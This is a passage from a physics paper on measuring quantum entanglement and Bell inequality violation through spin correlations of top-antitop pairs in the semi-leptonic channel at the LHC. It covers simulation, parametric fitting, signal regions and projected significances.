\tag{3.25}\] \[\cos\theta^{\prime\mathcal{AB}} =\sum_{i,j}\Omega_{i}^{\mathcal{A}}P_{ij}\Omega_{j}^{\mathcal{B}}. \tag{3.26}\] The vector \(\Omega_{i}^{\mathcal{A}}\) is the normalized three-momentum of the decay product of the top in the top rest frame and the vector \(\Omega_{i}^{\mathcal{B}}\) is the normalized three-momentum of the decay product of the anti-top in the anti-top rest frame. In the fully leptonic channel these would be the anti-lepton and lepton. In the semi-leptonic channel these would be anti-lepton or lepton and the optimal hadronic direction defined in Sec. 3.3. The matrix \(P_{ij}\) is \(\text{diag}(-1,-1,1)\)[8]. Extracting \(D\) and \(D_{3}\) via the asymmetry yields \[D =\frac{4}{\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}}\left(A_{\cos \theta^{\prime\mathcal{AB}}}\right), \tag{3.27}\] \[D_{3} =\frac{4}{\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}}\left(A_{\cos \theta^{\prime\mathcal{AB}}}\right). \tag{3.28}\] Measuring a quantity with a single observable was called the "direct" method in Ref. [8]. By contrast, measuring a quantity by first measuring each \(C_{ij}\) value individually, then combining them, was called the "individual" method. In the case of \((C_{11}+C_{22}+C_{33})/3\) using Eq. (3.27) is the direct method while using Eq. (3.13) is the individual method. Ref. [8] argued that the direct method naively has slightly better sensitivity since there is only one uncertainty whereas for the individual method, multiple quantities are measured so their uncertainties are combined. From Eqs. (3.18), (3.21), and (3.22) one sees that \(\mathcal{C}(\rho)=-3D-1\) in the threshold region and \(\mathcal{C}(\rho)=-3D_{3}-1\) in the boosted region. \(D\) is basis-independent because it is proportional to the trace of the spin correlation matrix \(C\). \(D_{3}\) is basis-dependent and we use the helicity basis. Experimentally, \(D\) has been measured by CMS [53]. They found a value of \(-0.237\pm 0.011\) without implementing an upper cut on \(m_{t\bar{t}}\)[4]. More recently, ATLAS measured \(-0.547\pm 0.02\) using an upper cut of 380 GeV on \(m_{t\bar{t}}\)[54]. ### Bell Inequality Violation in \(t\bar{t}\) To test Bell's inequality, we use the CHSH inequality, given in Eq. (13). Using fixed axes in the CHSH inequality, in the helicity basis this corresponds to the operator6 Footnote 6: At high \(p_{T}\) the helicity basis is known to result in large spin correlations [11] while near threshold the fixed beam basis has larger spin correlations. In the \(t\bar{t}\) system due to the contributions from the \(gg\) and \(q\bar{q}\) initial states, the Bell inequality violation near threshold is very small. For that reason we use the helicity basis and focus on the boosted region. Eq. (16) allows different choices for \(C_{33}-C_{11}\) and we choose \(C_{nn}-C_{rr}\) since it leads to the largest Bell inequality violation. \[B=C_{nn}-C_{rr},\hskip 28.452756ptB>\sqrt{2}\hskip 14.226378pt\text{ for Bell inequality violation.} \tag{29}\] In Fig. 4, we show \(B-\sqrt{2}\) in the phase space plane of \(\theta-m_{t\bar{t}}\). We see that Bell inequality violation is more appreciable at large \(m_{t\bar{t}}\) and large \(\theta\). We show how to construct the direct observable for \(B=C_{nn}-C_{rr}\), following Ref. [8]. Consider the azimuthal angles \(\phi^{\mathcal{A}}\) and \(\phi^{\mathcal{B}}\). The azimuthal angle \(\phi\) is the angle around the \(\hat{k}\) direction with the \(\phi=0\) in the \(\hat{n}-\hat{k}\) plane. We construct \[\phi_{+}=\frac{\phi^{\mathcal{A}}+\phi^{\mathcal{B}}}{2},\hskip 28.452756pt \phi_{-}=\frac{\phi^{\mathcal{A}}-\phi^{\mathcal{B}}}{2}. \tag{30}\] From Eq. (8) one obtains \[\frac{1}{\sigma}\frac{\text{d}\sigma}{\text{d}\phi_{+}\text{d} \phi_{-}}=\frac{1}{2\pi^{2}}+\frac{\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}}{ 32}\left(\frac{C_{nn}+C_{rr}}{2}\cos(2\phi_{-})+\frac{C_{nn}-C_{rr}}{2}\cos(2 \phi_{+})\right. \tag{31}\] \[\left.+\frac{C_{nr}+C_{rn}}{2}\sin(2\phi_{+})+\frac{C_{rn}-C_{nr }}{2}\sin(2\phi_{-})\right).\] Figure 4: The CHSH violation (\(B-\sqrt{2}\)) of the \(t\bar{t}\) system at parton-level in the \(\theta-m_{t\bar{t}}\) plane at \(\sqrt{s}=13\) TeV with no phase space cuts. CHSH violation is indicated by a value \((B-\sqrt{2})>0\). Values of \((B-\sqrt{2})\) that are \(<0\) are plotted as 0. The term proportional to \(C_{nn}-C_{rr}\) is the only term that is an even function with respect to \(\phi_{+}\) so it can be extracted through the asymmetry \[B=C_{nn}-C_{rr}=\frac{16}{\pi\,\kappa^{A}\kappa^{\mathcal{B}}}\left(A_{\cos(2 \phi_{+})}\right). \tag{3.32}\] Alternatively, we derive the full functional form by integrating out \(\phi_{-}\) and making a change of variable. Defining \(\phi_{P}=\frac{\pi}{2}-\big{|}\frac{\pi}{2}-|\pi-\phi_{+}|\big{|}\), after integrating out \(\phi_{-}\), the distribution is then \[\frac{1}{\sigma}\frac{\mathrm{d}\sigma}{\mathrm{d}\phi_{P}}=\frac{2}{\pi}+ \frac{\pi}{16}\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}\left(C_{nn}-C_{rr} \right)\cos(2\phi_{P}). \tag{3.33}\] Since we have derived the full functional form in Eq. (3.33), the value of \(B=C_{nn}-C_{rr}\) can also be extracted by a fit. ## 4 Results at the LHC ### Sketch of Expected Results Consider an observable \(\mathcal{O}\) that is sensitive to the presence of entanglement. One example would be the observable in Eq. (2.10). A useful observable will have a large difference between the measured value \(\mathcal{O}_{\mathrm{entangled}}\) for an entangled state and the predicted value \(\mathcal{O}_{\mathrm{null}}\) for a separable state with no entanglement. Let the measured value of the observable be \(\mathcal{O}_{\mathrm{entangled}}\pm\delta\mathcal{O}\) (corresponding to one standard deviation). The significance can be approximated by \[\mathrm{significance}\approx\frac{\mathcal{O}_{\mathrm{entangled}}-\mathcal{O }_{\mathrm{null}}}{\delta\mathcal{O}}. \tag{4.1}\] The sensitivity of the observable can be increased either by reducing the uncertainty \(\delta\mathcal{O}\) (for example, by collecting more data) or by choosing a quantum state with a larger expected value of \(\mathcal{O}_{\mathrm{entangled}}\) (for example, through phase space cuts). Reducing the uncertainty:The leptonic decay channels of \(W\to\ell\nu\) (\(\ell=e,\mu\)) have a branching fraction \(\mathrm{BR}(W\to\ell\nu)=0.21\)[55]. The branching fraction of \(t\bar{t}\) into the fully leptonic channel is thus \[\mathrm{BR}(t\bar{t}\to\ell\ell)=0.0455. \tag{4.2}\] There the complete final state consists of \(\ell^{-}\nu\bar{b}\ell^{+}\bar{\nu}b\), but we write it as \(\ell\ell\) for simplicity. The hadronic branching fraction of the \(W\) decay is \(\mathrm{BR}(W\to\mathrm{hadrons})=0.67\)[55], so the branching fraction of \(t\bar{t}\) into the semi-leptonic channel is \[\mathrm{BR}(t\bar{t}\to\ell j)=0.2877, \tag{4.3}\] which is about a factor of 6 larger than the fully leptonic channel. Again, we've written the final state as \(\ell j\) which represents either \(\ell^{-}\nu\bar{b}q\bar{q}^{\prime}b\) or \(q\bar{q}^{\prime}\bar{b}\ell^{+}\bar{\nu}b\). Assuming that the uncertainty on \(\mathcal{O}\) is statistics dominated, the uncertainty in the channel \(ij\) will scale as \(1/\sqrt{\mathrm{BR}(\bar{t}t\to ij)}\). Relative to the fully leptonic channel, we expect that the uncertainty on \(\mathcal{O}\) in the semi-leptonic channel is decreased by a factor of \(\sqrt{\mathrm{BR}(\bar{t}t\to\ell\ell)/\mathrm{BR}(\bar{t}t\to\ell j)}\) or a gain of a factor of 2.5. Naive Expectation:The correlation between the polarization of the top (or anti-top) and one of its decay products \(i\) is given by the spin analyzing power \(\kappa_{i}\), as discussed in Sec. 3.3 and Appendix C. The spin analyzing power of the anti-lepton (or lepton) in the top (or anti-top) decay is \(|\kappa_{\ell}|=1\); it is maximally correlated with the polarization of the top (or anti-top). For the hadronic decay of the top (or anti-top) the spin analyzing power is smaller and it is \(|\kappa_{q}|=0.64\). In the semi-leptonic channel, the leptonically-decaying top (or anti-top) uses the anti-lepton (or lepton) as a proxy for the polarization and the hadronically-decaying top (or anti-top) uses the jets as a proxy for the polarization. The observable for semi-leptonic channel has a different pre-factor (see Eq. (3.13)) than the fully leptonic channel which scales the uncertainty by a factor of \(|(\kappa_{\ell}\kappa_{\ell})/(\kappa_{\ell}\kappa_{q})|=1/0.64\). Combining both of the previous effects, we expect that the relative significance between the decay channel \(t\bar{t}\to ab\) and \(t\bar{t}\to cd\) is given by \[\frac{\text{significance }(t\bar{t}\to ab)}{\text{significance }(t\bar{t}\to cd)}=\frac{\kappa_{a}\kappa_{b}}{\kappa_{c}\kappa_{d}} \sqrt{\frac{\text{BR}(t\bar{t}\to ab)}{\text{BR}(t\bar{t}\to cd)}}. \tag{4.4}\] Comparing the semi-leptonic to the leptonic we have \[\frac{\text{significance }(t\bar{t}\to\ell q)}{\text{significance }(t\bar{t}\to\ell\ell)}=0.64\sqrt{\frac{0.2877}{0.0455}}=1.60. \tag{4.5}\] We naively expect an improvement of 60%. There will also be a further improvement in the reconstruction efficiency of the semi-leptonic channel because there is a single neutrino as opposed to the fully leptonic channel which has two neutrinos, as we will exploit in our full analysis of the semi-leptonic channel. Following the scaling as in Eq. (4.5), the fully hadronic channel is expected to gain 29% over the fully leptonic channel. Given the challenges for the signal identification and background suppression for the fully hadronic channel, we leave this to a future study. ### Simulation We perform our analyses in two stages. The first is "parton-level", where events are generated without parton shower or hadronization. The uncertainty for parton-level events is always just statistical from the number of events. We further carry out a "detector-level" (or "reconstructed") study, which includes parton showering, hadronization, detector simulation, and event reconstruction. Parameters extracted from the detector-level analysis are always corrected using parametric fitting (see Sec. 4.3) and the uncertainties include the impact of the parametric fitting. In the few instances where detector-level results are shown without parametric fitting it will be noted explicitly. All events are generated with Madgraph 5[56] at \(\sqrt{s}=13\) TeV using the NNPDF 2.3 parton distribution function [57]. Three samples are generated: a \(t\bar{t}\) sample that decays through the fully leptonic channel and two \(t\bar{t}\) samples that decay through the semi-leptonic channel. In all samples we generate \(pp\to t\bar{t}\) at leading order and then the events are decayed using Madspin[58]. We apply a flat \(k\)-factor of 1.8 to account for the QCD correction to the total cross section [59]. The leptonic sample includes the decays \(t\bar{t}\to(b\ell^{+}\nu_{\ell})(\bar{b}\ell^{-}\bar{\nu}_{\ell})\) where \(\ell=e,\mu\). It is generated with no phase space cuts and only at parton-level. The semi-leptonic samples include both \(t\bar{t}\to(b\ell^{+}\nu_{\ell})(\bar{b}q\bar{q}^{\prime})\) and \(t\bar{t}\to(bq\bar{q}^{\prime})(\bar{b}\ell^{-}\bar{\nu}_{\ell})\) where \(q,q^{\prime}\) are light flavor quarks. The partonic final states are then showered and hadronized with Pythia 8[60] and go through the detector simulation Delphes 3[61]. We have two semi-leptonic samples in two kinematic regions according to the invariant mass of the \(t\bar{t}\) system. Resolved sample:We first start with the semi-leptonic sample with no additional phase space cuts, which we call the "resolved sample." The event selection used is \[p_{T}(j) >25\ \text{GeV}, |\eta(j)| <2.5, \tag{4.6a}\] \[p_{T}(\ell) >25\ \text{GeV}, |\eta(\ell)| <2.5,\] (4.6b) \[\not{E}_{T} >30\ \text{GeV}. \tag{4.6c}\] Jets are clustered with the anti-\(k_{T}\) algorithm with a separation \(\Delta R=\sqrt{\Delta\phi^{2}+\Delta\eta^{2}}=0.5\)[62]. This is approximately the event selection corresponding to a single lepton trigger [42; 43]. To compute the spin correlation matrix, it is necessary to fully reconstruct the final state kinematics. This requires identifying two \(b\)-jets, estimating the four-vector of the neutrino (or anti-neutrino), and assigning each \(b\)-jet to either the leptonic pair or the jet pair. We employ a modified version [63] of the pseudo-top algorithm [64; 65]. If the event contains only one \(b\)-tagged jet, the hardest jet from the non-\(b\)-tagged jet is assumed to be the second \(b\)-jet. The neutrino (or anti-neutrino) four-vector is determined from the two components of the missing transverse energy vector and from solving the on-shell condition of the neutrino and the on-shell condition of the leptonically-decaying \(W\) boson. The resulting reconstruction efficiency is defined as the number of events that are successfully reconstructed compared to the total events generated. The differential reconstruction efficiency is shown in Fig. 5. We find that the reconstruction efficiency peaks around 19% near threshold and decreases as the invariant mass of the system, and consequently the boost of the top and anti-top, increases. Boosted sample:The other semi-leptonic sample is generated with \[m_{t\bar{t}}>800\ \text{GeV}, \tag{4.7}\] at parton-level and we call it the "boosted sample." This corresponds to a boost factor \(\gamma>2.3\) in the center-of-mass frame for a fast-moving top quark. We first cluster events with the anti-\(k_{T}\) algorithm into jets with \(\Delta R_{\text{sub}}=0.2\) and apply the event selection from Eq. (4.6). In the boosted sample we will call these subjets, even though they are clustered from the full event. We then recluster the event into "fat jets" \[\Delta R_{\text{fat}}=1.5,\hskip 28.452756pt|\eta|<2.5,\hskip 28.452756ptp_{T}>3 00\ \text{GeV}. \tag{4.8}\] A single fat jet \(J\) is matched to three subjets \(j_{\rm sub}\) by selecting the three highest \(p_{T}\) subjets that satisfy \[\Delta R(J,j_{\rm sub})<\Delta R_{\rm fat}. \tag{11}\] The three matched subjets are required to constitute most of the transverse momentum of the fatjet \[\frac{p_{T}(j_{\rm sub1}+j_{\rm sub2}+j_{\rm sub3})}{p_{T}(J)}>0.9. \tag{12}\] The hadronic top is then taken to be the four-vector sum of the three subjets \(p_{\rm top}=p_{j_{\rm sub_{1}}}+p_{j_{\rm sub_{2}}}+p_{j_{\rm sub_{3}}}\). This procedure approximately corresponds to the fat jets and corresponding subjets that would result from the trimming procedure [66]. One of the three matched subjets is expected to be \(b\)-tagged. If none are \(b\)-tagged, the highest \(p_{T}\) of the matched subjets is assumed to be the \(b\)-jet. Finally, the mass of the hadronic top \(m=\sqrt{p_{\rm top}^{2}}\) is required to be close to the 175 GeV, and we choose it in the range \((150~{}{\rm GeV},225~{}{\rm GeV})\). Figure 5: Reconstruction efficiency in the \(\theta-m_{t\bar{t}}\) plane for the resolved semi-leptonic sample at \(\sqrt{s}=13~{}{\rm TeV}\). The weak (orange line) and strong (red line) regions correspond to signal regions in Sec. 4.4. The differential reconstruction efficiency for the boosted selection is shown in Fig. 6. For moderately boosted tops where \(m_{t\bar{t}}\lesssim 1000\) GeV the resolved sample has a higher reconstruction efficiency. For tops with \(m_{t\bar{t}}\gtrsim 1000\) GeV the reconstruction efficiency of the boosted selection is better by more than an order of magnitude. We find that even for \(m_{t\bar{t}}\approx 2\) TeV the reconstruction efficiency remains above 3% in the signal regions where \(\theta\approx\pi/2\). ### Unfolding and Parametric Fitting While the events selection cuts in Eq. (4.6) are very minimal in terms of the event identification, they have a sizable impact on the angular distributions that are used to extract the spin correlation coefficients. For example, consider the distribution of \(\cos\theta_{n}^{\mathcal{A}}\cos\theta_{n}^{\mathcal{B}}\) which, by Eq. (3.10), can be used to measure \(C_{nn}\). In Fig. 7, the red line shows the differential distribution of \(\cos\theta_{n}^{\mathcal{A}}\cos\theta_{n}^{\mathcal{B}}\) with no phase space cuts. This is the distribution that would be used to extract the value of \(C_{nn}\). The effect of the event selection is shown by the blue line. The selection distorts the distribution which invalidates the parameter estimation. The yellow line shows the effects of the detector simulation which further alters the distribution. In order to measure spin correlations accurately, it is necessary to restore distributions to their inclusive shapes. Let \(\vec{x}_{\rm truth}\) be the data if it could be measured with no detector effects or phase space Figure 6: Reconstruction efficiency in the \(\theta-m_{t\bar{t}}\) plane for the boosted semi-leptonic sample generated at \(\sqrt{s}=13\) TeV. The weak (orange line) and strong (red line) regions correspond to signal regions in Sec. 4.4. The reconstruction efficiency is higher in the boosted sample than in the resolved sample for these two signal regions. cuts, and \(\vec{x}_{\rm detected}\) be the measured data. We call the effect of the detector and cuts "folding" \[\vec{x}_{\rm truth}\xrightarrow{\rm folding}\vec{x}_{\rm detected}=R\cdot\vec{x} _{\rm truth}, \tag{4.11}\] where the matrix \(R\) is the response matrix. Unfolding is the procedure that attempts to undo both detector effects and phase space cuts via \(\vec{x}_{\rm truth}=R^{-1}\cdot\vec{x}_{\rm detected}\). Generally, this is an ill-defined inversion problem which means that algorithm and regularization choices are required to obtain a result. These choices are actually very important in the case of entanglement and Bell inequality violation because the experimental sensitivity is entirely driven by the obtainable uncertainty on spin correlation measurements. Ideally the unfolding procedure itself would not substantially increase the uncertainty. Let the uncertainty from statistics only be \(\Delta_{\rm stat}\) and let the uncertainty after detector effects and unfolding be \(\Delta_{\rm tot}\), such that for a given measurement the increase from statistics only is a factor of \(\Delta_{\rm tot}/\Delta_{\rm stat}\). In Ref. [6] the increase is a factor of \(1.46-1.53\) while in Ref. [16] the factor is 0.88 (meaning that the final uncertainty is smaller than the statistics only uncertainty). Past studies on this topic, including Refs. [5; 6; 16], have used either the Iterative Bayesian (IB) method [67] or the Singular Value Decomposition (SVD) method [68] implemented in either the RooUnfold package [69] or TSVDUnfold package [68]. For both of these methods one needs to choose both the number of bins to use in the unfolding and a parameter related to regularization. In previous studies it was stated that the resulting uncertainty of spin correlation measurements was stable with respect to different choices. Figure 7: Parton-level differential distribution of \(\cos\theta_{n}^{\mathcal{A}}\cos\theta_{n}^{\mathcal{B}}\) at \(\sqrt{s}=13\) TeV with no cuts applied (red) and with event selection from Eq. (4.6) (blue) and with detector simulation (yellow). By contrast we find that variations to these parameters can change the resulting uncertainty by up to 75%. As there are many fewer events in the detected sample compared to the truth sample, some level of instability is expected. These variations are shown in detail in Appendix A along with results from an alternative unfolding method called the One-at-a-time Strict Bound method (OSB) [70]. In our work, we apply the more common procedure used by the LHC experiments of parametric fitting. While unfolding is typically applied at the level of distributions, parametric fitting is applied to the parameter estimation. Consider a parameter \(\Theta\), then schematically parametric fitting can be described as \[\vec{x}_{\rm truth}(\Theta)\xrightarrow{\rm folding}\vec{x}_{\rm predicted}( \Theta)=R\cdot\vec{x}_{\rm truth}(\Theta). \tag{4.12}\] The data \(\vec{x}_{\rm detected}\) is fit to \(\vec{x}_{\rm predicted}(\Theta)\) to extract the value of \(\Theta\). Here there is no need to invert the response matrix and therefore it is not dependent on a regularization parameter. We find this method to be more stable and more intuitive than unfolding. The uncertainty on the parameter \(\Theta\) can be calculated by performing pseudo-experiments. In our work, we carry out 1000 pseudo-experiments. More details are presented in Appendix A. ### Signal Regions From Figs. 3 and 4, it is clear that the size of entanglement and of Bell inequality violation differs over phase space. To maximize the observable signals we specify four signal regions. These are shown graphically in Fig. 8 as non-rectangular cuts in the \(\theta-m_{t\bar{t}}\) plane. The "threshold" region (the green region in Fig. 8) selects events that are very close to threshold. There is an additional cut in this region to further enhance the significance, which is requiring the velocity of the \(t\bar{t}\) system in the lab frame, \(\beta=p_{t\bar{t}}/m_{t\bar{t}}\), to satisfy \[|\beta|\leq 0.9, \tag{4.13}\] as proposed by Ref. [8]. In this region, the \(t\bar{t}\) pair is primarily produced in a spin singlet state from gluon fusion [15]. The \(t\bar{t}\) cross section is also largest near threshold. These facts together make this region ideal for detecting entanglement. The "boosted" region (the blue region in Fig. 8) selects events where the top and anti-top are moderately boosted and the angle \(\theta\) is sizable. This region corresponds to the other entangled region from Fig. 3. At high \(p_{T}\), the \(t\bar{t}\) pair is primarily produced in a spin triplet state from incoming gluons, however due to the falling cross section at larger \(m_{t\bar{t}}\) we expected lower detection significance compared to the threshold region. The "weak" region (the orange region in Fig. 8) selects events at larger \(m_{t\bar{t}}\) and larger \(\theta\). From Fig. 4, it can be seen that unlike for entanglement, Bell inequality violation is only observable for large \(m_{t\bar{t}}\). Finally, the "strong" region (the red region in Fig. 8) is even more restrictive on \(m_{t\bar{t}}\) and \(\theta\). While the strong region is expected to more effectively isolate the phase space with Bell inequality violation, there are fewer events with the more restrictive cuts. We include this region in addition to the weak region because a priori we do not know which region will have more sensitivity. Note that the weak region is a subset of the boosted region and the strong region is a subset of both the boosted region and the weak region. ### Entanglement Results Before presenting results on entanglement, in Table 1 we show the measured values of the elements of the spin correlation matrix \(C_{ij}\) in the helicity basis in the threshold region. The values of \(C_{ij}\) are measured using Eq. (3.13). Parton-level results contain no event selection and detector-level results are fully corrected. The uncertainties on parton-level results are purely statistical while the uncertainties on detector-level results are larger because they include additional sources of uncertainty from the detector simulation and from the parametric fitting. The uncertainties are different for different entries of the \(C_{ij}\) matrix because each distribution gets distorted by detector effects in different ways. The distribution itself also impacts the resulting uncertainty. For the entries of the spin correlation matrix parametric fitting increases the uncertainties by a factor of \(2-4\). The outcomes, however, are quite stable and robust. Figure 8: Signal regions in the \(\theta-m_{t\bar{t}}\) plane. The regions for entanglement are: threshold (green) and boosted (blue). The regions for Bell inequality violation are: weak (orange) and strong (red, overlap in orange). Results for entanglement are given by two times the concurrence \(2\mathcal{C}(\rho)\), where the concurrence is given by Eq. (3.18). Entanglement is indicated by \(2\mathcal{C}(\rho)>0\). The factor of two is included for easier comparison with other studies [6; 8]. Results at parton-level are shown in Table 2 (top). The uncertainty is purely statistical taking the number of events as \(\epsilon N_{\rm parton}\) where \(\epsilon\) is the average reconstruction efficiency for that signal region and \(N_{\rm parton}=k\times\mathcal{L}\times\sigma_{\rm LO}\), where the \(k\)-factor is 1.8 and the luminosity for the existing LHC data is 139 fb\({}^{-1}\). The individual results are calculated from Eq. (3.13) and the direct results are calculated from Eqs. (3.27) and (3.28). Since all results are well above a significance of \(5\sigma\), we show the precision which is given by \(\Delta\mathcal{C}(\rho)/\mathcal{C}(\rho)\). Comparing the threshold and boosted signal regions, we see that while the boosted region has a larger concurrence, the threshold region has about an order of magnitude of more events, yielding an uncertainty about 3 times smaller. Furthermore, the direct method reduces the uncertainty on the parton-level results by about 20% which is consistent with Ref. [8]. Entanglement results at detector-level after parametric fitting are shown in Table 2 (bottom). The value of \(N_{\rm detected}\) accounts for detector efficiencies. The central value of \(2\mathcal{C}(\rho)\) does not change relative to the parton-level result which is expected. The uncertainty, however, is larger than the statistics-only result by roughly a factor of 3 for the individual method and a factor of 2 for the direct method. The precision as a function of luminosity is shown in Fig. 9 (left) at parton-level. With only statistical errors, the parton-level result predicts that a 1% precision can be achieved with around 300 fb\({}^{-1}\), corresponding to the end of LHC Run-3. The results from the fully leptonic channel are also shown for comparison. This channel is calculated at parton-level using the same efficiency that was calculated in the semi-leptonic sample.7 Our calculation from Sec. 4.1 predicted an improvement of 60% which is what the parton-level result also finds. Our leptonic result is consistent with Ref. [8] (see Appendix B for a full comparison). Footnote 7: The actual efficiency for the leptonic channel [6] is expected to be lower than in the semi-leptonic channel. Figure 9 (right) shows the precision as a function of luminosity with the detector simulation. Including the detector effects increases the data required to reach 1% precision to \begin{table} \begin{tabular}{c|r r r} \hline parton-level & \(n\) & \(r\) & \(k\) \\ \hline \(n\) & \(-0.500\pm 0.006\) & \(0.000\pm 0.006\) & \(0.000\pm 0.006\) \\ \(r\) & \(-0.004\pm 0.006\) & \(-0.361\pm 0.006\) & \(-0.010\pm 0.006\) \\ \(k\) & \(-0.006\pm 0.006\) & \(-0.004\pm 0.006\) & \(-0.656\pm 0.006\) \\ \hline detector-level & \(n\) & \(r\) & \(k\) \\ \hline \(n\) & \(-0.510\pm 0.012\) & \(0.000\pm 0.023\) & \(0.001\pm 0.019\) \\ \(r\) & \(0.001\pm 0.022\) & \(-0.359\pm 0.023\) & \(0.000\pm 0.030\) \\ \(k\) & \(-0.005\pm 0.019\) & \(0.000\pm 0.026\) & \(-0.655\pm 0.020\) \\ \end{tabular} \end{table} Table 1: The spin correlation matrix \(C_{ij}\) at parton-level (top) and at detector-level (bottom) in the threshold region generated at \(\sqrt{s}=13\) TeV with \(\mathcal{L}=139\) fb\({}^{-1}\). roughly 1200 fb\({}^{-1}\). Even with the current LHC dataset, a detection of \(5\sigma\) is still easily obtainable. ### Bell Inequality Violation Results Table 3 (top) presents results for Bell inequality violation at parton-level. Bell inequality violation is measured by \((B-\sqrt{2})\) where \(B\) is given by Eq. (3.29). Results with the individual method are calculated from Eq. (3.13) and with the direct method from Eq. (3.32). Bell inequality violation occurs when \((B-\sqrt{2})>0\). With only statistical uncertainties, we find that Bell inequality violation can only be probed at \(\approx 2\sigma\) with 300 fb\({}^{-1}\). With the projected \begin{table} \begin{tabular}{||c||c c c||c||} \hline \multirow{2}{*}{Parton-level} & \multirow{2}{*}{Efficiency} & \(\epsilon\,N_{\text{parton}}\) & \multicolumn{2}{c||}{\(2\mathcal{C}(\rho)\)} & \multirow{2}{*}{Precision} \\ & & \((139\,\text{fb}^{-1})\) & (Individual) & (Direct) \\ \hline Threshold & 0.16 & \(1.26\times 10^{6}\) & \(0.518\pm 0.010\) & \(0.522\pm 0.008\) & 1.6\% \\ \hline Boosted & 0.13 & \(1.15\times 10^{5}\) & \(0.576\pm 0.032\) & \(0.566\pm 0.027\) & 4.8\% \\ \hline \hline \multirow{2}{*}{Reconstructed} & \(N_{\text{detected}}\) & \multicolumn{2}{c||}{\(2\mathcal{C}(\rho)\)} & \multirow{2}{*}{Precision} \\ & \((139\,\text{fb}^{-1})\) & (Individual) & (Direct) & \\ \hline Threshold & \(1.26\times 10^{6}\) & \(0.523\pm 0.033\) & \(0.522\pm 0.016\) & 3.0\% \\ \hline Boosted & \(1.15\times 10^{5}\) & \(0.549\pm 0.084\) & \(0.552\pm 0.052\) & 9.5\% \\ \hline \end{tabular} \end{table} Table 2: Measurements of \(2\mathcal{C}(\rho)\) generated at \(\sqrt{s}=13\) TeV and \(\mathcal{L}=139\) fb\({}^{-1}\) at parton-level (top) and after detector simulation, reconstruction, and parametric fitting (bottom). Entanglement is indicated by \(2\mathcal{C}(\rho)>0\). The efficiency indicated is the average over the specified signal region. The precision uses the direct measurement both at parton-level and at reconstruction-level. Figure 9: Expected precision of entanglement detection as a function of the integrated luminosity at the 13 TeV LHC at parton-level (left) and after detector simulation, reconstruction, and parametric fitting (right). luminosity of the HL-LHC the significance is above \(5\sigma\). Bell inequality violation at detector-level after parametric fitting is shown in Table 3 (bottom). The individual measurements have an uncertainty that increases by a factor of 1.6 compared to the parton-level results. The direct measurements, which use Eq. (3.33), on the other hand increase by a factor of 2.3 and are actually worse than the individual measurements. This is because the uncertainty depends on the shape of the distribution and the properties of the detector smearing. With 300 \(\mathrm{fb}^{-1}\) the significance is only \(1.3\sigma\) and even at the HL-LHC the significance only reaches \(4.1\sigma\). The significance as a function of luminosity is shown in Fig. 10 (left) at parton-level. We show results from the leptonic channel for comparison. With the estimation from Sec. 4.1, we expected a 60% improvement over the leptonic result at the parton level, while we obtain a 54% improvement. Our leptonic result is consistent with Ref. [8] (see Appendix B for a full comparison). The detector-level result is shown in Fig. 10 (right). Comparing to the detector-level leptonic [6] results we find a factor of 3 improvement thanks to the higher efficiency in our channel (see Appendix B). ## 5 Summary and Conclusions There has been increasing interest in testing quantum entanglement and violations of Bell inequalities at high-energy colliders, which explore physics at much shorter space-time scales than traditional quantum experiments. The \(t\bar{t}\) system is an exemplar of a two qubit system where the detailed quantum mechanical properties of the system are exhibited through the production and decay of the \(t\) and \(\bar{t}\). In this article, we explored entanglement in the \(t\bar{t}\) system at the LHC via spin correlations when one of the top quarks decays leptonically and the other \begin{table} \begin{tabular}{||c||c c c||c c||} \hline \multirow{2}{*}{Parton-level} & \multirow{2}{*}{Efficiency} & \multicolumn{2}{c||}{\(\epsilon N_{\mathrm{parton}}\)} & \multicolumn{2}{c||}{\(B-\sqrt{2}\)} & \multicolumn{2}{c||}{Significance} \\ & & \((300\,\mathrm{fb}^{-1})\) & (Individual) & (Direct) & \((300\,\mathrm{fb}^{-1})\) & \((3000\,\mathrm{fb}^{-1})\) \\ \hline Weak & 0.080 & 6280 & \(0.22\pm 0.11\) & \(0.22\pm 0.10\) & \(2.2\sigma\) & \(7.0\sigma\) \\ \hline Strong & 0.078 & 4127 & \(0.26\pm 0.14\) & \(0.25\pm 0.12\) & \(2.0\sigma\) & \(6.4\sigma\) \\ \hline \hline \multirow{2}{*}{Reconstructed} & \multicolumn{2}{c||}{\(N_{\mathrm{detected}}\)} & \multicolumn{2}{c||}{\(B-\sqrt{2}\)} & \multicolumn{2}{c||}{Significance} \\ & \multicolumn{2}{c||}{\((300\,\mathrm{fb}^{-1})\)} & \multicolumn{2}{c||}{(Individual)} & \multicolumn{2}{c||}{(Direct)} & \multicolumn{2}{c||}{\((300\,\mathrm{fb}^{-1})\)} & \multicolumn{2}{c||}{\((3000\,\mathrm{fb}^{-1})\)} \\ \hline Weak & 6280 & \(0.23\pm 0.18\) & \(0.22\pm 0.22\) & \(1.3\sigma\) & \(4.1\sigma\) \\ \hline Strong & 4127 & \(0.27\pm 0.22\) & \(0.25\pm 0.28\) & \(1.2\sigma\) & \(3.8\sigma\) \\ \hline \end{tabular} \end{table} Table 3: Measurements of \((B-\sqrt{2})\) generated at \(\sqrt{s}=13\) TeV and \(\mathcal{L}=139\)\(\mathrm{fb}^{-1}\) at parton-level (top) and after detector simulation, reconstruction, and parametric fitting (bottom). CHSH violation is indicated by \((B-\sqrt{2})>0\). The efficiency indicated is the average over the specified signal region. The significance uses the direct measurement at parton-level and uses the individual measurement at reconstruction-level. hadronically. This channel has advantages over the fully leptonic channel, namely that there are roughly six times more events and the kinematic reconstruction is more efficient. In Sec. 2, after a brief review of quantum entanglement and Bell non-locality, we identified observables to test these quantum properties. These quantum observables were related to collider observables in Sec. 3. In particular the spins of the \(t\) and \(\bar{t}\) are the qubits while spin correlations encode the entanglement between qubits. The spins are then measured through the angles of the decay products of the \(t\) and \(\bar{t}\). In Sec. 4, we showed our results in searching for evidence of quantum entanglement and Bell inequality violation in the semi-leptonic decay channel where the final state includes one lepton, one neutrino, two \(b\)-jets, and two light-quark-initiated jets from the \(W\) decay. The \(t\bar{t}\) system exhibits entanglement both near threshold and at high \(p_{T}\). We showed that the events near threshold provide a more sensitive probe of quantum entanglement owing to a larger number of events relative to the high-\(p_{T}\) region. Tests of Bell inequality violation, on the other hand, require a stronger signal which is only present in the signal region with highly-boosted top quarks. The semi-leptonic channel, which is the focus of this work, yields a higher efficiency for event reconstruction than the leptonic case. Going beyond just the 